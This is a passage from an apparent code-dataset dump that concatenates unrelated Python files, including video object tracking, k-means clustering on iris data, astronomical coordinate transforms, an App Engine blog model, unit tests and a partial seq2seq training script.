'a5'),\n ('nom_ld', 'a80'),\n])\n\nnumber_dtype = np.dtype([\n ('street_id', 'int32'),\n ('locality_id', 'int32'),\n ('number', 'int16'),\n ('rep', 'int8'),\n ('geohash', 'uint64'),\n])\n\n\nclass AddressDatabase:\n\n def __init__(self):\n # data tables\n self.cities = self.load_data(city_db_path, dtype=city_dtype)\n self.streets = self.load_data(street_db_path, dtype=street_dtype)\n self.localities = self.load_data(locality_db_path,\n dtype=locality_dtype)\n self.numbers = self.load_data(number_db_path, dtype=number_dtype)\n\n # indices\n self.cities_post_index = self.load_data(cities_post_index_path)\n self.streets_insee_index = self.load_data(streets_insee_index_path)\n self.localities_insee_index = self.load_data(\n localities_insee_index_path)\n self.numbers_locality_index = self.load_data(\n numbers_locality_index_path)\n self.numbers_geohash_index = self.load_data(\n numbers_geohash_index_path)\n\n def load_data(self, file_path, dtype='int32'):\n return np.memmap(file_path, dtype=dtype)\n","sub_path":"src/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"294717265","text":"#!/usr/bin/env python3\n\nimport argparse\nimport openem\nimport os\nimport cv2\nimport numpy as np\nfrom openem.tracking import *\nimport json\nimport sys\nimport datetime\nimport pytator\nfrom pprint import pprint\nfrom collections import defaultdict\n\nimport yaml\nimport math\n\ndef crop_localization(frame_bgr, localization):\n img_width = frame_bgr.shape[1]\n img_height = frame_bgr.shape[0]\n box_x = round(localization['x'] * img_width)\n box_y = round(localization['y'] * img_height)\n box_width = round(localization['width'] * img_width)\n box_height = round(localization['height'] * img_height)\n img_crop = frame_bgr[box_y:box_y+box_height,box_x:box_x+box_width,:]\n return img_crop\n\ndef join_up_iteration(detections, track_ids):\n tracklets = defaultdict(list)\n num_tracklets = np.max(track_ids) + 1\n assert(len(detections) == len(track_ids))\n for d,tid in zip(detections, track_ids):\n tracklets[tid].append(d)\n return tracklets\n\ndef extend_tracklets(tracklets, length):\n for track_id,track in tracklets.items():\n if len(track) <= 16:\n continue\n\n ext_length = min(length,len(track))\n sum_h=0.0\n sum_w=0.0\n\n track.sort(key=lambda x:x['frame'])\n\n def restore_det(det):\n det['x'] = det.get('orig_x',det['x'])\n det['y'] = det.get('orig_y',det['y'])\n det['width'] = det.get('orig_w',det['width'])\n det['height'] = det.get('orig_h',det['height'])\n det['orig_x'] = det['x']\n det['orig_y'] = det['y']\n det['orig_w'] = det['width']\n det['orig_h'] = det['height']\n restore_det(track[0])\n restore_det(track[-1])\n\n for d in track:\n sum_h += d['height']\n sum_w += d['width']\n angle,vel,comps = track_vel(track)\n vel_x = comps[0]\n vel_y = comps[1]\n avg_h = sum_h / len(track)\n avg_w = sum_w / len(track)\n new_x = min(1,max(0,track[-1]['x']+(vel_x*ext_length)))\n new_y = min(1,max(0,track[-1]['y']+(vel_y*ext_length)))\n old_x = min(1,max(0,track[0]['x']-(vel_x*ext_length)))\n old_y = min(1,max(0,track[0]['y']-(vel_y*ext_length)))\n\n\n min_x = min(track[-1]['x'],new_x)\n min_y = min(track[-1]['y'],new_y)\n if min_x > 0 and min_y > 0:\n track[-1]['x'] = min_x\n track[-1]['y'] = min_y\n track[-1]['width'] = min(max(0,abs(new_x-track[-1]['x'])+avg_w),1)\n track[-1]['height'] = min(max(0,abs(new_x-track[-1]['y'])+avg_h),1)\n else:\n track[-1]['width'] = 0\n track[-1]['height'] = 0\n\n\n min_x = min(track[0]['x'],old_x)\n min_y = min(track[0]['y'],old_y)\n if min_x > 0 and min_y > 0:\n track[0]['x'] = min(max(0,min_x),1)\n track[0]['y'] = min(max(0,min_y),1)\n track[0]['width'] = min(max(abs(old_x-track[0]['x'])+avg_w,0),1)\n track[0]['height'] = min(max(abs(old_x-track[0]['y'])+avg_h,0),1)\n else:\n track[0]['width'] = 0\n track[0]['height'] = 0\n return tracklets\n\n\ndef split_tracklets(tracklets):\n track_ids=[]\n detections=[]\n for track_id,track in tracklets.items():\n for d in track:\n track_ids.append(track_id)\n detections.append(d)\n return detections,track_ids\n\ndef trim_tracklets(detections, track_ids, max_length):\n tracklets = join_up_iteration(detections, track_ids)\n next_track_id = 1\n new_tracklets = {}\n for track_id,detections in tracklets.items():\n new_track_count=math.ceil(len(detections)/max_length)\n for i in range(new_track_count):\n start=max_length*i\n end=max_length+(max_length*i)\n new_tracklets[next_track_id] = detections[start:end]\n next_track_id += 1\n detections, track_ids = split_tracklets(new_tracklets)\n track_ids = renumber_track_ids(track_ids)\n return detections, track_ids\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(description=__doc__)\n pytator.tator.cli_parser(parser)\n parser.add_argument(\"--detection-type-id\", type=int, required=True)\n parser.add_argument(\"--tracklet-type-id\", type=int, required=True)\n parser.add_argument(\"--version-number\", type=int)\n parser.add_argument(\"--version-id\", type=int)\n parser.add_argument(\"--strategy-config\", type=str)\n parser.add_argument('media_files', type=str, nargs='+')\n args = parser.parse_args()\n\n # Weight methods\n methods = ['hybrid', 'iou', 'iou-motion']\n\n # Weight methods that require the video\n visual_methods = ['hybrid']\n\n tator = pytator.Tator(args.url, args.token, args.project)\n version_id = None\n if args.version_number:\n pprint(tator.Version.all())\n for version in tator.Version.all():\n if version['number'] == args.version_number:\n version_id = version['id']\n print(f\"Using version ID {version_id}\")\n elif args.version_id:\n version_id = args.version_id\n\n\n default_strategy = {\"method\": \"hybrid\",\n \"frame-diffs\": [1,2,4,8,16,32,64,128,256],\n \"args\": {},\n \"extension\": {'method' : None},\n \"max-length\": {},\n \"min-length\": 0}\n\n if args.strategy_config:\n strategy = {**default_strategy}\n with open(args.strategy_config, \"r\") as strategy_file:\n strategy.update(yaml.load(strategy_file))\n else:\n strategy = default_strategy\n\n if strategy['method'] == 'hybrid':\n model_file = strategy['args']['model_file']\n batch_size = strategy['args'].get('batch_size', 4)\n comparator=FeaturesComparator(model_file)\n #extractor=FeaturesExtractor(args.model_file)\n\n print(\"Strategy: \")\n pprint(strategy)\n for media_file in args.media_files:\n localizations_by_frame = {}\n comps=os.path.splitext(os.path.basename(media_file))[0]\n media_id=comps.split('_')[0]\n lookup = {\"type\": args.detection_type_id,\n \"media_id\" : media_id}\n localizations = tator.Localization.filter(lookup)\n if len(localizations) == 0:\n print(f\"No localizations present in media {media_file}\")\n continue\n print(f\"Processing {len(localizations)} detections\")\n # Group by localizations by frame\n for lid, local in enumerate(localizations):\n frame = local['frame']\n if frame in localizations_by_frame:\n localizations_by_frame[frame].append(local)\n else:\n localizations_by_frame[frame] = [local]\n\n detections=[]\n track_ids=[]\n track_id=1\n\n media = tator.Media.get(media_id)\n media_shape = (media['height'], media['width'])\n fps = media['fps']\n\n if strategy['method'] in visual_methods:\n vid=cv2.VideoCapture(media_file)\n ok=True\n frame = 0\n while ok:\n ok,frame_bgr = vid.read()\n if frame in localizations_by_frame:\n for l in localizations_by_frame[frame]:\n if strategy['method'] == 'hybrid':\n l['bgr'] = crop_localization(frame_bgr, l)\n if l['attributes']['Confidence'] < 0.50:\n continue\n detections.append(l)\n track_ids.append(track_id)\n track_id += 1\n frame+=1\n else:\n # The method is analytical on the detections coordinates\n # and does not require processing the video\n for frame,detections in localizations_by_frame.items():\n for det in detections:\n detections.append(det)\n track_ids.append(track_id)\n track_ids += 1\n\n track_ids = renumber_track_ids(track_ids)\n\n if strategy['method'] == 'hybrid':\n weights_strategy = HybridWeights(comparator,\n None,\n None,\n media_shape,\n fps,\n 0.0,\n batch_size)\n elif strategy['method'] == 'iou':\n weights_strategy = IoUWeights(media_shape, **strategy['args'])\n elif strategy['method'] == 'iou-motion':\n weights_strategy = IoUMotionWeights(media_shape, **strategy['args'])\n # Generate localization bgr based on grouped localizations\n for x in strategy['frame-diffs']:\n detections, track_ids, pairs, weights, is_cut, constraints = join_tracklets(\n detections,\n track_ids,\n x,\n weights_strategy)\n\n if x in strategy['max-length']:\n trim_to = strategy['max-length'][x]\n print(f\"Trimming track to max length of {trim_to}\")\n detections, track_ids = trim_tracklets(detections, track_ids, trim_to)\n _,det_counts_per_track=np.unique(track_ids,return_counts=True)\n print(f\"frame-diff {x}: {len(detections)} to {len(det_counts_per_track)}\")\n\n if x > 1 and strategy['extension']['method'] == 'linear-motion':\n ext_frames=x\n print(f\"Extending by linear motion, {ext_frames}\")\n tracklets = join_up_iteration(detections,track_ids)\n tracklets = extend_tracklets(tracklets, ext_frames)\n detections, track_ids = split_tracklets(tracklets)\n\n # Now we make new track objects based on the result\n # from the graph solver\n # [ detection, detection, detection, ...]\n # [ track#, track#, track#,...]\n # [ 133, 33, 13, 133,]\n # [ 0,0,1,1]\n # TODO: Handle is_cut?\n def join_up_final(detections, track_ids):\n tracklets = defaultdict(list)\n num_tracklets = np.max(track_ids) + 1\n assert(len(detections) == len(track_ids))\n for d,tid in zip(detections, track_ids):\n tracklets[tid].append(d)\n return tracklets\n\n def make_object(track):\n # Only use last 50% for velocity\n track_len = len(track)\n velocity_len = int(track_len*0.50)\n track.sort(key=lambda x:x['frame'])\n angle,speed,comps = track_vel(track[velocity_len:])\n obj={\"type\": args.tracklet_type_id,\n \"media_ids\": [int(media_id)],\n \"localization_ids\": [x['id'] for x in track],\n \"Species\": \"Tracklet\",\n \"length\": len(track),\n \"angle\": math.degrees(angle),\n \"speed\": speed,\n \"version\": version_id}\n print(f\"{track[0]['frame']}: {angle} - {comps}\")\n angle = math.degrees(angle)\n # Remark: y is down, so 90 degrees is DOWN.\n if len(track) < 200:\n obj['Species'] = 'Toss out'\n elif speed < 0.00001:\n obj['Species'] = 'Stationary'\n elif angle > -45 and angle < 45:\n obj['Species'] = 'Exiting'\n elif angle > -135 and angle < 175:\n obj['Species'] = 'Entering'\n else:\n obj['Species'] = 'Unknown'\n return obj\n\n tracklets = join_up_final(detections, track_ids)\n new_objs=[make_object(tracklet) for tracklet in tracklets.values() if len(tracklet) > strategy['min-length']]\n with open(f\"/work/{media_id}.json\", \"w\") as f:\n json.dump(new_objs,f)\n tator.Track.new(new_objs)\n tator.Media.update(int(media_id), {\"attributes\":{\"Tracklet Generator Processed\": str(datetime.datetime.now())}})\n","sub_path":"scripts/tator_tracker.py","file_name":"tator_tracker.py","file_ext":"py","file_size_in_byte":12024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"64574377","text":"from astropy.coordinates import SkyCoord, EarthLocation, AltAz\nfrom astroplan import Observer\nimport yaml\nimport astropy.units as u\nimport sys\n\ndef transform(ra_dec_list, parameter_file_name):\n \n with open(parameter_file_name, 'r') as param_file:\n param_dict = yaml.safe_load(param_file)\n prototype_dish = EarthLocation(lat = param_dict['telescope']['antenna_position']['latitude'] * u.deg, lon = param_dict['telescope']['antenna_position']['longitude'] * u.deg, height = param_dict['telescope']['antenna_position']['height'] * u.m)\n \n ra_list = ra_dec_list[0]\n dec_list = ra_dec_list[1]\n v_time = ra_dec_list[2]\n \n sc = SkyCoord(ra_list, dec_list, unit='deg', frame=\"icrs\")\n prototype_dish_observer = Observer(location=prototype_dish)\n grid_altaz = sc.transform_to(AltAz(obstime=v_time, location=prototype_dish))\n \n az_list = [grid_altaz[i].az.value for i in range(len(grid_altaz))]\n alt_list = [grid_altaz[i].alt.value for i in range(len(grid_altaz))]\n parallactic_angle_list = prototype_dish_observer.parallactic_angle(time = v_time, target = sc).deg\n \n table = \"\"\n for i in range(len(az_list)):\n table_line=\"{0} {1:3.8f} {2:3.8f} {3} {4}\".format(v_time[i].mjd, az_list[i], alt_list[i], 1, parallactic_angle_list[i], file = sys.stdout, flush = True)\n table+=table_line+\"\\n\"\n \n return[az_list, alt_list, v_time, table]\n","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"53016548","text":"#coding=utf-8\n\nfrom google.appengine.ext import db\nfrom users.models import User\n\nclass Post(db.Model):\n author = db.ReferenceProperty(User, collection_name='posts')\n title = db.StringProperty(required=True)\n body = db.TextProperty(required=True)\n\n created_at = db.DateTimeProperty(auto_now_add=True)\n modified_at = db.DateTimeProperty(auto_now=True)\n\n def to_dict(self):\n return {\n 'id' : self.key().id(),\n 'title' : self.title,\n 'body' : self.body,\n 'created_at' : self.created_at.strftime('%Y-%m-%d %H:%M:%S'),\n 'modified_at' : self.modified_at.strftime('%Y-%m-%d %H:%M:%S'),\n 'author' : self.author.to_dict()\n }\n\n def belongs_to(self, user):\n return user.key() == self.author.key()\n\n @classmethod\n def fetch(cls, since_post=None, until_post=None, count=8):\n queryset = cls.all().order('-created_at')\n query = {\n 'limit' : count,\n 'offset' : 0\n }\n \n if since_post:\n queryset.filter('created_at >', since_post.created_at)\n results_count = queryset.count()\n \n if results_count > count:\n args['offset'] = result-count-count \n \n elif until_post:\n queryset.filter('created_at <', until_post.created_at)\n\n return queryset.fetch(**query)\n \n\n\n","sub_path":"posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"411489213","text":"from __future__ import (absolute_import, division, print_function)\n\nimport unittest\nimport os\n\nfrom fitbenchmarking.utils.misc import get_problem_files\n\n\nclass CreateDirsTests(unittest.TestCase):\n\n def base_path(self):\n \"\"\"\n Helper function that returns the path to\n /fitbenchmarking/benchmark_problems\n \"\"\"\n\n current_dir = os.path.dirname(os.path.realpath(__file__))\n parent_dir = os.path.dirname(os.path.normpath(current_dir))\n main_dir = os.path.dirname(os.path.normpath(parent_dir))\n root_dir = os.path.dirname(os.path.normpath(main_dir))\n bench_prob_dir = os.path.join(root_dir, 'benchmark_problems')\n\n return bench_prob_dir\n\n def all_neutron_problems(self):\n \"\"\"\n Helper function that returns the names of all neutron problems.\n \"\"\"\n\n neutron_problems = [['ENGINX193749_calibration_peak19.txt',\n 'ENGINX193749_calibration_peak20.txt',\n 'ENGINX193749_calibration_peak23.txt',\n 'ENGINX193749_calibration_peak5.txt',\n 'ENGINX193749_calibration_peak6.txt',\n 'ENGINX236516_vanadium_bank1_10brk.txt',\n 'ENGINX236516_vanadium_bank1_20brk.txt',\n 'EVS14188-90_Gaussian_peaks_1.txt',\n 'EVS14188-90_Gaussian_peaks_2.txt',\n 'GEMpeak1.txt',\n 'WISH17701_peak1.txt', 'WISH17701_peak2.txt',\n 'WISH17701_peak3.txt', 'WISH17701_peak4.txt',\n 'WISH17701_peak5.txt', 'WISH17701_peak6.txt',\n 'WISH17701_peak7.txt', 'WISH17701_peak8.txt',\n 'WISH17701_peak9.txt']]\n\n return neutron_problems\n\n def all_nist_problems(self):\n \"\"\"\n Helper function that returns the names of Nist low diff problems.\n \"\"\"\n\n nist_ld_problems = [['Misra1a.dat', 'Chwirut2.dat', 'Chwirut1.dat',\n 'Lanczos3.dat', 'Gauss1.dat', 'Gauss2.dat',\n 'DanWood.dat', 'Misra1b.dat']]\n\n return nist_ld_problems\n\n def test_getProblemFiles_get_correct_nist_probs(self):\n\n data_dir = os.path.join(self.base_path(), 'NIST', 'low_difficulty')\n nist_problems = self.all_nist_problems()\n\n problem_groups = get_problem_files(data_dir)\n problem_groups_expected = nist_problems\n\n self.assertTrue(problem_groups_expected, problem_groups)\n\n def test_getProblemFiles_return_expected_neutron_paths(self):\n\n base_path_neutron = os.path.join(self.base_path(), 'Neutron')\n neutron_problems = self.all_neutron_problems()\n\n paths_to_neutron_problems = \\\n get_problem_files(base_path_neutron)\n # Please see the above for loop comments for\n # a description of this one\n paths_to_neutron_problems_expected = []\n for neutron_level_group in neutron_problems:\n paths_to_level_group = \\\n [os.path.join(base_path_neutron, neutron_prob_name)\n for neutron_prob_name in neutron_level_group]\n\n paths_to_neutron_problems_expected.append(paths_to_level_group)\n\n self.assertListEqual(paths_to_neutron_problems_expected[0],\n paths_to_neutron_problems)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"fitbenchmarking/utils/tests/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"633797787","text":"# Make a package.\nfrom lovely.remotetask.service import TaskService\n\ntry:\n from Products.Five.site.interfaces import IFiveUtilityRegistry\n ZOPE2=True\nexcept ImportError:\n ZOPE2=False\n \n# This is implemented as IDatabaseOpenedEvent in Zope 3\nif ZOPE2:\n from lovely.remotetask.service import TaskService, getAutostartServiceNames\n from lovely.remotetask.interfaces import ITaskService\n from zope.component import ComponentLookupError\n from zope.app.component.hooks import getSite, setSite\n from Products.CMFCore.interfaces._content import ISiteRoot\n\n def initialize(context):\n # dirty trick, but it works\n app = context._ProductContext__app\n services = getAutostartServiceNames()\n old_site = getSite()\n for service in services:\n site_name, service_name = service.split('@')\n if site_name:\n site = getattr(app, site_name, None)\n if site:\n registry = site.getSiteManager()\n setSite(site) # blah, five/localsitemanager/registry.py ver. 1.1, line 108, in _wrap can't find site.\n service = registry.getUtility(ITaskService, name=service_name)\n if ITaskService.providedBy(service) and not service.isProcessing():\n service.startProcessing()\n setSite(old_site)\n","sub_path":"lovely.remotetask/tags/port-for-zope210-before-gotcha-work/src/lovely/remotetask/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"419770064","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 16 11:31:45 2020\r\n@author: Hexin Yuan 19210240055\r\n\"\"\"\r\nimport numpy as np\r\n\r\n\r\ndef import_data_from_iris(filename):\r\n data = []\r\n cluster_raw = []\r\n\r\n with open(str(filename), 'r') as f:\r\n for line in f:\r\n line_temp = line.strip().split()\r\n line_temp_dumy = []\r\n for j in range(0, len(line_temp) - 1):\r\n line_temp_dumy.append(float(line_temp[j]))\r\n data.append(line_temp_dumy)\r\n cluster_raw.append(line_temp[j + 1])\r\n\r\n return data, cluster_raw\r\n\r\n\r\ndef eucl_distance(p1, p2):\r\n return np.sqrt(np.sum((p1 - p2) ** 2))\r\n\r\n\r\ndef init_centroids(data, k):\r\n samples_num, dim = data.shape\r\n num_arr = np.arange(0, samples_num)\r\n np.random.shuffle(num_arr)\r\n centroids = data[num_arr[:k], :]\r\n return centroids\r\n\r\n\r\ndef k_means(data, k):\r\n samples_num = data.shape[0]\r\n cluster_data = np.array(np.zeros((samples_num, 2)))\r\n cluster_changed = True\r\n centroids = init_centroids(data, k)\r\n print(\"初始类中心点:\\n\", centroids)\r\n count = 0\r\n\r\n while cluster_changed:\r\n count += 1\r\n cluster_changed = False\r\n for i in range(samples_num):\r\n min_dist = 100000.0\r\n min_index = 0\r\n for j in range(k):\r\n distance = eucl_distance(centroids[j, :], data[i, :])\r\n if distance < min_dist:\r\n min_dist = distance\r\n cluster_data[i, 1] = min_dist\r\n min_index = j\r\n if cluster_data[i, 0] != min_index:\r\n cluster_changed = True\r\n cluster_data[i, 0] = min_index\r\n for j in range(k):\r\n cluster_index = np.nonzero(cluster_data[:, 0] == j)\r\n points_in_cluster = data[cluster_index]\r\n centroids[j, :] = np.mean(points_in_cluster, axis=0)\r\n\r\n print(\"迭代次数:\", count)\r\n return centroids, cluster_data\r\n\r\n\r\ndef calculate_accuracy(cluster_data, k_num):\r\n right = 0\r\n for k in range(0, k_num):\r\n checker = [0, 0, 0]\r\n for i in range(0, 50):\r\n checker[int(cluster_data[i + 50 * k, 0])] += 1\r\n right += max(checker)\r\n return right\r\n\r\n\r\nif __name__ == '__main__':\r\n data, cluster_raw = import_data_from_iris(\"iris.dat\")\r\n print(\"iris.dat数据:\\n\", data)\r\n dataArr = np.array(data)\r\n\r\n centroids, cluster_data = k_means(dataArr, 3)\r\n print(\"聚类结果类中��:\\n\", centroids)\r\n\r\n for i in range(3):\r\n print(i, \"类包含的样本\")\r\n for j in range(len(data)):\r\n if int(cluster_data[j, 0]) == i:\r\n print(j, data[j], \"到质心距离:\", cluster_data[j, 1])\r\n\r\n right_num = calculate_accuracy(cluster_data, 3)\r\n print(\"错误率:\", 1 - right_num / len(data))\r\n\r\n\r\n","sub_path":"demo - k-means.py","file_name":"demo - k-means.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"71340137","text":"\"\"\" Statistics \"\"\"\n\nfrom itertools import islice, groupby\nfrom collections import defaultdict\nimport tempfile\nimport subprocess\nimport datetime\n\nimport data\nfrom entry import Entry\n\nWEEKDAY_STR = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\n\ndef activity_calendar(args, formatter='text', span=None):\n \"\"\"Build a github-like activity calendar for the last `span` days.\n Positional argument `formatter` determines the driver used,\n defaulting to text. \"\"\"\n\n formatter = 'html' if args.html else 'text'\n\n span = span or args.days or 365\n day_modifier = '-{0} days'.format(span)\n\n db = data.DataFacilities(dbfile=args.db_file)\n\n watched = db.query(\"SELECT origdate, count(movie) FROM movies \"\n + \"WHERE origdate >= date('now', ?) \"\n + \"GROUP BY date(origdate) \"\n + \"ORDER BY origdate ASC \"\n , (day_modifier,))\n\n watcheddict = defaultdict(lambda: 0)\n for date, count in watched:\n d = date.date()\n watcheddict[d] = count\n\n text = FORMATTERS[formatter](watcheddict)\n\n if args.open:\n with tempfile.NamedTemporaryFile(suffix='.html') as tf:\n # At least Firefox in linux will not throw the page away\n # even when the tempfile under it is removed quite\n # immediately.\n tf.write(text)\n tf.flush()\n subprocess.call([\"xdg-open\", tf.name])\n else:\n print(text)\n\n### FORMATTERS\n## Take the dict of {date: count} and return string outputs for\n## files/stdout.\n\n\n### Formatter helpers\n\ndef get_date_interval(start_date, end_date=None):\n \"\"\"Get two date objects, return a list of dates in between. Rounds\n in full weeks.\"\"\"\n\n # round up to full weeks\n start_date += datetime.timedelta(days=-start_date.weekday())\n\n end_date = end_date or datetime.date.today()\n end_date += datetime.timedelta(days=(6-end_date.weekday()))\n\n dateint = []\n while start_date <= end_date:\n dateint.append(start_date)\n start_date += datetime.timedelta(days=1)\n \n return dateint\n\ndef get_weekstarts(date_interval):\n \"\"\"Collect beginning date of each week in separate list. We do\n assume that the list begins with your begin date of choice.\"\"\"\n return [d for d in islice(date_interval, 0, None, 7)]\n\ndef actcal_text(watched):\n \"\"\"Format activity calendar in text.\"\"\"\n\n dateint = get_date_interval(start_date=sorted(watched.keys())[0])\n weekstarts = get_weekstarts(dateint)\n\n monthline = ' '.join(d.strftime(\"%b\") for d in weekstarts)\n result = []\n result.append(\" \" * 4 + \"| \" + monthline)\n result.append(\" \" * 4 + \"| \"\n + ' '.join('{0:<3}'.format(ws.day) for ws in weekstarts))\n result.append('=' * (len(monthline) + 6))\n\n for weekday in range(0, 7):\n row = '{0} | '.format(WEEKDAY_STR[weekday])\n for d in islice(dateint, weekday, None, 7):\n row += '{0} '.format(watched[d])\n result.append(row)\n\n return '\\n'.join(result)\n\n\ndef draw_view_graph(watched):\n \"\"\"Draw and return an SVG code snippet of views cumulating over time.\"\"\"\n try:\n import pygal\n except ImportError:\n return \"ERROR: pygal not installed\"\n\n chart = pygal.Line(width=600, height=400,\n disable_xml_declaration=True,\n style=pygal.style.LightStyle)\n\n chart.title = 'Views over time'\n chart.show_legend = False\n chart.show_dots = False\n\n wsorted = sorted(watched.keys())\n\n cumsum = [(wsorted[0], watched[wsorted[0]])]\n for key in wsorted[1:]:\n lastval = cumsum[-1][1]\n cumsum.append((key, lastval + watched[key]))\n\n xlabels = [''] * len(cumsum)\n for ind in range(0, len(cumsum), 7):\n xlabels[ind] = cumsum[ind][0].strftime(\"%a %b %Y\")\n\n chart.x_labels = xlabels\n chart.x_label_rotation = 45\n chart.add('View count', [s[1] for s in cumsum])\n\n return \"
{0}
\".format(chart.render())\n\ndef actcal_html(watched):\n \"\"\"Format activity calendar in HTML. Also include a SVG graph of\n views cumulating.\"\"\"\n dateint = get_date_interval(start_date=sorted(watched.keys())[0])\n weekstarts = get_weekstarts(dateint)\n\n result = [\n '',\n '',\n '',\n '',\n ''\n ]\n\n result.append(\"

Films watched in {0}...{1}

\".format(\n dateint[0], dateint[-1]))\n result.append(\"\")\n\n def silent_coercion(i):\n \"\"\"Coerce given object to integer. If not integer, throw\n something negative.\"\"\"\n try:\n return int(i)\n except ValueError:\n return -1\n\n def make_row(items, force_class=None):\n res = ['']\n for i in items:\n format_class = ''\n if silent_coercion(i) > 2:\n format_class = 'lots'\n elif i == 2:\n format_class = 'good'\n elif i == 1:\n format_class = 'one'\n\n if force_class:\n format_class = force_class\n\n format_string = ''\n res.append(format_string.format(i))\n res.append('')\n return ''.join(res)\n\n monthline = [d.strftime(\"%b
%d\") for d in weekstarts]\n result.append(make_row([''] + monthline, 'heading'))\n for weekday in range(0, 7):\n row = make_row([WEEKDAY_STR[weekday]] +\n [watched[d]\n for d in islice(dateint, weekday, None, 7)])\n result.append(row)\n \n \n result.append(\"
{0}
\")\n\n # result.append(\"

Views over time

\")\n result.append(draw_view_graph(watched))\n\n result.append(\"\")\n result.append(\"\")\n\n return '\\n'.join(result)\n \n\nFORMATTERS = {'text': actcal_text,\n 'html': actcal_html}\n","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":6219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"46763209","text":"# coding: utf-8\nfrom __future__ import division\nfrom __future__ import print_function\nfrom six.moves import xrange\nimport argparse, sys, os, codecs, random, math, time\nimport numpy as np\nimport chainer\nimport chainer.functions as F\nfrom chainer import training, Variable, optimizers, cuda\nfrom chainer.training import extensions\nsys.path.append(os.path.split(os.getcwd())[0])\nfrom common import ID_UNK, ID_PAD, ID_GO, ID_EOS, bucket_sizes, stdout, print_bold\nfrom dataset import read_data, make_buckets, make_source_target_pair, sample_batch_from_bucket\nfrom eve import Eve\nfrom model import seq2seq, load_model, save_model, save_vocab\nfrom error import compute_mean_wer, compute_random_mean_wer, softmax_cross_entropy\nfrom translate import show_random_source_target_translation\n\n# reference\n# https://www.tensorflow.org/tutorials/seq2seq\n\ndef main(args):\n\t# load textfile\n\tsource_dataset, target_dataset, vocab, vocab_inv = read_data(args.source_filename, args.target_filename, train_split_ratio=args.train_split, dev_split_ratio=args.dev_split, seed=args.seed)\n\tsave_vocab(args.model_dir, vocab, vocab_inv)\n\n\tsource_dataset_train, source_dataset_dev, source_dataset_test = source_dataset\n\ttarget_dataset_train, target_dataset_dev, target_dataset_test = target_dataset\n\tprint_bold(\"data\t#\")\n\tprint(\"train\t{}\".format(len(source_dataset_train)))\n\tprint(\"dev\t{}\".format(len(source_dataset_dev)))\n\tprint(\"test\t{}\".format(len(source_dataset_test)))\n\n\tvocab_source, vocab_target = vocab\n\tvocab_inv_source, vocab_inv_target = vocab_inv\n\tprint(\"vocab\t{}\t(source)\".format(len(vocab_source)))\n\tprint(\"vocab\t{}\t(target)\".format(len(vocab_target)))\n\n\t# split into buckets\n\tsource_buckets_train, target_buckets_train = make_buckets(source_dataset_train, target_dataset_train)\n\tif args.buckets_limit is not None:\n\t\tsource_buckets_train = source_buckets_train[:args.buckets_limit+1]\n\t\ttarget_buckets_train = target_buckets_train[:args.buckets_limit+1]\n\n\tprint_bold(\"buckets \t#data\t(train)\")\n\tfor size, data in zip(bucket_sizes, source_buckets_train):\n\t\tprint(\"{} \t{}\".format(size, len(data)))\n\n\tprint_bold(\"buckets \t#data\t(dev)\")\n\tsource_buckets_dev, target_buckets_dev = make_buckets(source_dataset_dev, target_dataset_dev)\n\tif args.buckets_limit is not None:\n\t\tsource_buckets_dev = source_buckets_dev[:args.buckets_limit+1]\n\t\ttarget_buckets_dev = target_buckets_dev[:args.buckets_limit+1]\n\tfor size, data in zip(bucket_sizes, source_buckets_dev):\n\t\tprint(\"{} \t{}\".format(size, len(data)))\n\n\tprint_bold(\"buckets\t\t#data\t(test)\")\n\tsource_buckets_test, target_buckets_test = make_buckets(source_dataset_test, target_dataset_test)\n\tif args.buckets_limit is not None:\n\t\tsource_buckets_test = source_buckets_test[:args.buckets_limit+1]\n\t\ttarget_buckets_test = target_buckets_test[:args.buckets_limit+1]\n\tfor size, data in zip(bucket_sizes, source_buckets_test):\n\t\tprint(\"{} \t{}\".format(size, len(data)))\n\n\t# to maintain equilibrium\n\tmin_num_data = 0\n\tfor data in source_buckets_train:\n\t\tif min_num_data == 0 or len(data) < min_num_data:\n\t\t\tmin_num_data = len(data)\n\trepeats = []\n\tfor data in source_buckets_train:\n\t\trepeats.append(len(data) // min_num_data + 1)\n\n\tnum_updates_per_iteration = 0\n\tfor repeat, data in zip(repeats, source_buckets_train):\n\t\tnum_updates_per_iteration += repeat * args.batchsize\n\tnum_iteration = len(source_dataset_train) // num_updates_per_iteration + 1\n\n\t# init\n\tmodel = load_model(args.model_dir)\n\tif model is None:\n\t\tmodel = seq2seq(len(vocab_source), len(vocab_target), args.ndim_embedding, args.num_layers, ndim_h=args.ndim_h, pooling=args.pooling, dropout=args.dropout, zoneout=args.zoneout, wgain=args.wgain, densely_connected=args.densely_connected, attention=args.attention)\n\tif args.gpu_device >= 0:\n\t\tcuda.get_device(args.gpu_device).use()\n\t\tmodel.to_gpu()\n\n\t# setup an optimizer\n\tif args.eve:\n\t\toptimizer = Eve(alpha=args.learning_rate, beta1=0.9)\n\telse:\n\t\toptimizer = optimizers.Adam(alpha=args.learning_rate, 